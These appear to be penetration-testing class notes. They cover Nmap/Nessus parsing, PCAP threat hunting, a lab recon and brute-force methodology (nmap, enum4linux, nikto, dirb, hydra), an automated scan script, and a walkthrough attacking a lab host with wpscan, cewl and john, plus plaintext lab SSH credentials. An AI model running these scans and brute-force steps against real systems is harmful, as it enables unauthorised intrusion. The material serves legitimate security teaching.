cd ps
---------------------------------------------------------------
 
 
 
 
------------------------Type This------------------------------
cd c:\ps
mkdir PowerShell-Files
cd PowerShell-Files
(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")
(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")
(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")
---------------------------------------------------------------
 
 
Run Powershell as administrator
------------------------Type This------------------------------
cd C:\ps\\PowerShell-Files
 
Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted –Force
---------------------------------------------------------------
 
 
Parse nmap XML
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml
---------------------------------------------------------------
 
 
Process all XML files
------------------------Type This------------------------------
.\parse-nmap.ps1 *.xml
---------------------------------------------------------------
 
Piping also works
------------------------Type This------------------------------
dir *.xml | .\parse-nmap.ps1
---------------------------------------------------------------
 
Advanced parsing with filtering conditions
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
---------------------------------------------------------------
 
 
More parsing
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
---------------------------------------------------------------
 
Parsing with match and multiple conditions
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
---------------------------------------------------------------
 
 
CSV Export
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
---------------------------------------------------------------
 
Import Data from CSV
------------------------Type This------------------------------
$data = import-csv weblisteners.csv
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
---------------------------------------------------------------
 
 
Export to HTML
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
---------------------------------------------------------------
 
 
########################################
# Parsing Nessus scans with PowerShell #
########################################
If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
 
 
 
Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | Get-Member
---------------------------------------------------------------
 
filter the objects:
 
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"}
---------------------------------------------------------------
 
use the Select-Object cmdlet and only get unique entries:
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
 
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
------------------------Type This------------------------------
 
ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
---------------------------------------------------------------










                      ###################################
####################### Introduction to Threat Hunting  ################################
                      ###################################



##################################################################
# Analyzing a PCAP Prads                                         #
# Note: run as regular user                                      #
##################################################################
 
---------------------------Type this as a regular user----------------------------------
cd ~/yourname
 
mkdir pcap_analysis/
 
cd pcap_analysis/
 
mkdir prads
 
cd prads
 
wget http://45.63.104.73/suspicious-time.pcap
 
prads -r suspicious-time.pcap -l prads-asset.log
 
cat prads-asset.log | less
 
cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
 
cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
 
cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
-----------------------------------------------------------------------
 
 
 
 
##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user      #
##################################
---------------------------Type this as a regular user----------------------------------
cd ~/yourname
 
 
cd pcap_analysis/
 
mkdir chaos_reader/
 
cd chaos_reader/
 
wget http://45.63.104.73/suspicious-time.pcap
 
wget http://45.63.104.73/chaosreader.pl
 
perl chaosreader.pl suspicious-time.pcap
 
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
 
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
 
 
for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u
 
python -m SimpleHTTPServer    
          ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
 
------------------------------------------------------------------------
 
 
 
 
 
 
 
 
#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular user---------------------------------
cd ~/yourname
 
mkdir pcap_analysis/
 
cd pcap_analysis/
 
mkdir tshark
 
cd tshark
 
wget http://45.63.104.73/suspicious-time.pcap
 
tshark -i ens3 -r suspicious-time.pcap -qz io,phs
 
tshark -r suspicious-time.pcap -qz ip_hosts,tree
 
tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
 
tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
 
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
 
whois rapidshare.com.eyu32.ru
 
whois sploitme.com.cn
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
 
tshark -r suspicious-time.pcap -qz http_req,tree
 
tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------














Here is the information to put into putty
 
Host Name:          108.61.216.188
protocol:           ssh
port:               22
username:           hacklab
password:           hacklab!cybersecurity! 







-----------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------




Some tools to install:
---------------------------Type This-----------------------------------
apt install -y libcurl4-openssl-dev zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev onesixtyone snmp onesixtyone snmp nmap  smbclient libnss-winbind winbind
-----------------------------------------------------------------------



---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------
 
 
 
 
##############################
# Scanning Process to follow #
##############################
 
Step 1: Host Discovery
----------------------
 
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
 
nmap -sL 172.31.2.0/24
 
nmap -sS --open -p 22,445 172.31.2.0/24
 
propecia 172.31.2 22 > file1
propecia 172.31.2 445 > file2
cat file1 file2 > file3
cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
cat lab.txt
-----------------------------------------------------------------------
 
 
Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>
nmap -sU -p 69,161 <IP-ADDRESS>
 
 
---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.0/24
sudo nmap -sU -p 69,161 172.31.2.0/24
-----------------------------------------------------------------------
 
 
Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
    |
    ----> Vulnerability Research
 
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.0/24
-----------------------------------------------------------------------
 
 
 
 
Step 4: Enumerate common Windows/Linux file sharing services
Step 3 is where most people STOP, and you need to move on and look deeper
------------------------------------------------------------
 
---------------------------Type This-----------------------------------
sudo apt install smbclient libnss-winbind winbind
git clone https://github.com/portcullislabs/enum4linux.git
cd enum4linux/
perl enum4linux.pl -U 172.31.2.11
 
nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.24
---------------------------------------------------------------------------------------
 
 
 
Step 5: Vulnerability Scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2
 
cd Nikto2/program
 
perl nikto.pl -h <IP-ADDRESS>
 
 
 
Step 6: Directory Bruteforce every webserver
--------------------------------------------
sudo apt install -y libcurl4-openssl-dev
 
git clone https://github.com/v0re/dirb.git
 
cd dirb/
 
./configure
 
make
 
./dirb
 
./dirb http://<IP-ADDRESS> wordlists/big.txt
 
 
 
 
 
Step 7: Analyze source code of all webpages found
-------------------------------------------------
lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
 
If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
 
$ wget \
     --recursive \
     --no-clobber \
     --page-requisites \
     --html-extension \
     --convert-links \
     --restrict-file-names=windows \
     --domains website.org \
     --no-parent \
         www.website.org/tutorials/html/
 
 
This command downloads the Web site www.website.org/tutorials/html/.
 
The options are:
 
--recursive: download the entire Web site.
 
--domains website.org: don't follow links outside website.org.
 
--no-parent: don't follow links outside the directory tutorials/html/.
 
--page-requisites: get all the elements that compose the page (images, CSS and so on).
 
--html-extension: save files with the .html extension.
 
--convert-links: convert links so that they work locally, off-line.
 
--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
 
--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
 
 
 
Step 8: Bruteforce any services you find
----------------------------------------
sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev
cd ~/toolz
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
hydra -l user -P passlist.txt ftp://<IP-ADDRESS
 
 
 
##################
# Host Discovery #
##################
 
Reason:
-------
You have to discover the reachable hosts in the network before you can attack them.
 
 
Hosts discovery syntax:
-----------------------
    nmap -sP 172.31.2.0/24
    propecia 172.31.2 22 > file1
    propecia 172.31.2 445 > file2
    cat file1 file2 > file3
    cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
    cat lab.txt
 
Issues:
-------
Issue we had to deal with was hosts that didn't respond to ICMP
 
 
    Hosts discovered:
    -----------------
	172.31.2.24
	172.31.2.47
	172.31.2.117
	172.31.2.181
	172.31.2.217
	172.31.2.238
	172.31.2.254

 
 
 
 
 
 
#####################
# Service Discovery #
#####################
 
Reason:
-------
Identifying what services are running on what hosts allows for you to map the network topology.
 
 
 
Port Scan syntax:
    sudo nmap -sS -Pn -iL lab.txt
    sudo nmap -sU -p69,161 -Pn -iL lab.txt
 
 
 
Services discovered:
--------------------
 
joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
 
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
9999/tcp open  abyss
 
Nmap scan report for 172.31.2.11
Host is up.
 
PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp
 
 
Nmap scan report for 172.31.2.14
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
9999/tcp open  abyss
 
 
Nmap scan report for 172.31.2.14
Host is up.
 
PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp
 
 
Nmap scan report for 172.31.2.47
Host is up (0.086s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
 
Nmap scan report for 172.31.2.64
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc
 
Nmap scan report for 172.31.2.86
Host is up (0.086s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy
 
Nmap scan report for 172.31.2.117
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2020/tcp open  xinupageserver
 
Nmap scan report for 172.31.2.157
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
 
Nmap scan report for 172.31.2.217
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3260/tcp open  iscsi
 
Nmap scan report for 172.31.2.238
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6969/tcp open  acmsoda
 
Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
 
 
 
 
 
 
 
 
 
##############################################
# Service Version Discovery (Bannergrabbing) #
##############################################
Reason:
-------
Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
 
 
 
Port Scan syntax:
 
joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
 
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
 
Nmap scan report for 172.31.2.14
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
 
Nmap scan report for 172.31.2.47
Host is up (0.087s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap scan report for 172.31.2.64
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap scan report for 172.31.2.86
Host is up (0.087s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3    Dovecot pop3d
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
 
Nmap scan report for 172.31.2.117
Host is up (0.086s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
2020/tcp open  ftp     vsftpd 2.0.8 or later
Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap scan report for 172.31.2.157
Host is up (0.086s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
 
Nmap scan report for 172.31.2.217
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap scan report for 172.31.2.238
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp   open  http     nginx 1.6.2
6969/tcp open  acmsoda?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
 
 
 
 
 
 
 
-----------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
 
#!/bin/bash
 
# Script made during the CyberWar class for the students to play with, debug, and improve.
# Take a look at the following websites for ideas:
# https://github.com/commonexploits/port-scan-automation
# https://www.commonexploits.com/penetration-testing-scripts/
# https://github.com/averagesecurityguy/scripts
# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
 
 
 
# Some thoughts of things to add to this script:
# Shodan queries (API key)
# AWS scanning (need credentials)
# Jenkins scanning
# Active Directory enumeration
# Github scanning (API key required)
# Blockchain platforms
 
 
 
 
 
 
 
#############################################
# Check to see if script is running as root #
#############################################
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
  exit
fi
 
 
####################################
# Check to see if gcc is installed #
####################################
file1="/usr/bin/gcc"
if [ -f "$file1" ]
then
    echo "$file is installed."
    clear
else
    echo "$file not found."
    echo Installing gcc
    apt-get install -y gcc
    clear
fi
 
########################
# Make the directories #
########################
cd /tmp
rm -rf customerAudit/
rm -rf NetworkAudit/
mkdir -p /tmp/NetworkAudit/discovered_services/
mkdir -p /tmp/NetworkAudit/scan/windows/
mkdir -p /tmp/NetworkAudit/scan/sunrpc/
mkdir -p /tmp/NetworkAudit/scan/ssh/
mkdir -p /tmp/NetworkAudit/scan/ftp/
mkdir -p /tmp/NetworkAudit/scan/http/
mkdir -p /tmp/NetworkAudit/scan/telnet/
mkdir -p /tmp/NetworkAudit/scan/pop3/
mkdir -p /tmp/NetworkAudit/scan/printers/
mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
 
 
#####################
# Download propecia #
#####################
file2="/bin/propecia"
if [ -f "$file2" ]
then
    echo "$file is installed."
    clear
else
    echo "$file not found."
    echo Installing propecia
    cd /tmp
    wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
    gcc propecia.c -o propecia
    cp propecia /bin
fi
 
######################
# Find Windows Hosts #
######################
clear
echo "Scanning for windows hosts."
propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
clear
echo "Done scanning for windows hosts. FTP is next."
 
 
##################
# Find FTP Hosts #
##################
echo "Scanning for hosts running FTP."
propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
clear
echo "Done scanning for FTP hosts. SSH is next."
 
##################
# Find SSH Hosts #
##################
echo "Scanning for hosts running SSH."
propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
clear
echo "Done scanning for SSH hosts. POP3 is next."
 
 
###################
# Find POP3 Hosts #
###################
echo "Scanning for hosts running POP3."
propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
clear
echo "Done scanning for POP3 hosts. SunRPC is next."
 
 
#####################
# Find SunRPC Hosts #
#####################
echo "Scanning for hosts running SunRPC."
propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
clear
echo "Done scanning for SunRPC hosts. Telnet is next."
 
 
#####################
# Find Telnet Hosts #
#####################
echo "Scanning for hosts running Telnet."
propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
clear
echo "Done scanning for Telnet hosts. HTTP is next."
 
 
###################
# Find HTTP Hosts #
###################
echo "Scanning for hosts running HTTP"
propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
clear
echo "Done scanning for HTTP hosts. HTTPS hosts are next."
 
 
###################
# Find HTTPS Hosts #
###################
echo "Scanning for hosts running HTTP"
propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
clear
echo "Done scanning for HTTPS hosts. Databases are next."
 
 
##################
# Find Databases #
##################
echo "Scanning for hosts running MS SQL Server"
propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
clear
 
echo "Scanning for hosts running Oracle"
propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
clear
 
echo "Scanning for hosts running Postgres"
propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
clear
 
echo "Scanning for hosts running MongoDB"
propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
clear
 
echo "Scanning for hosts running MySQL"
propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
clear
echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
 
 
###############################
# Ok, let's do the NMAP files #
###############################
clear
# Windows
for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
echo "Done with Windows."
 
clear
# FTP
for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
echo "Done with FTP."
 
clear
# SSH
for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
echo "Done with SSH."
 
clear
# SUNRPC
for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
echo "Done with SunRPC."
 
clear
# POP3
for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg  $x > /tmp/NetworkAudit/scan/pop3/$x ; done
echo "Done with POP3."
 
# clear
# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."
 
 
# clear
# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."
 
 
clear
# SQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
echo "Done with MS SQL."
 
clear
# Oracle Servers
# FIX THIS: needs brute force wordlists for this to run correctly
# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
# echo "Done with Oracle."
 
clear
# MongoDB
for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info  $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
echo "Done with MongoDB."
 
 
clear
# MySQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
echo "Done with MySQL."
 
 
# Add postgres nse scripts
# References:
# https://nmap.org/nsedoc/lib/pgsql.html
# https://nmap.org/nsedoc/scripts/pgsql-brute.html
#
 
echo " "
echo " "
sleep 1
clear
echo "Done, now check your results."
sleep 2
clear
cd /tmp/NetworkAudit/scan/
ls
 
 
 
----------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
 
                            ######################################
----------- ############### # Day 2: Attacking Hosts in the lab  ################ -----------
                            ######################################
 
######################
# Attacking Minotaur #
######################
 
Step 1: Portscan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.117
-----------------------------------------------------------------------
 
 
 
Step 2: Vulnerability scan the web server
---------------------------Type This-----------------------------------
cd /home/hacklab/toolz/Nikto2/program
perl nikto.pl -h 172.31.2.117
-----------------------------------------------------------------------
 
 
 
Step 3: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd /home/hacklab/toolz/dirb
./dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
-----------------------------------------------------------------------
 
### dirb output ###
==> DIRECTORY: http://172.31.2.117/bull/
-----------------------------------------------------------------------
 
 
Step 4: Run wordpress vulnerability scanner
---------------------------Type This-----------------------------------
wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
 
 
cewl -w words.txt http://172.31.2.117/bull/
 
 
cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
 
wc -l whateverbro.txt
 
john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
 
wc -l words-john.txt
 
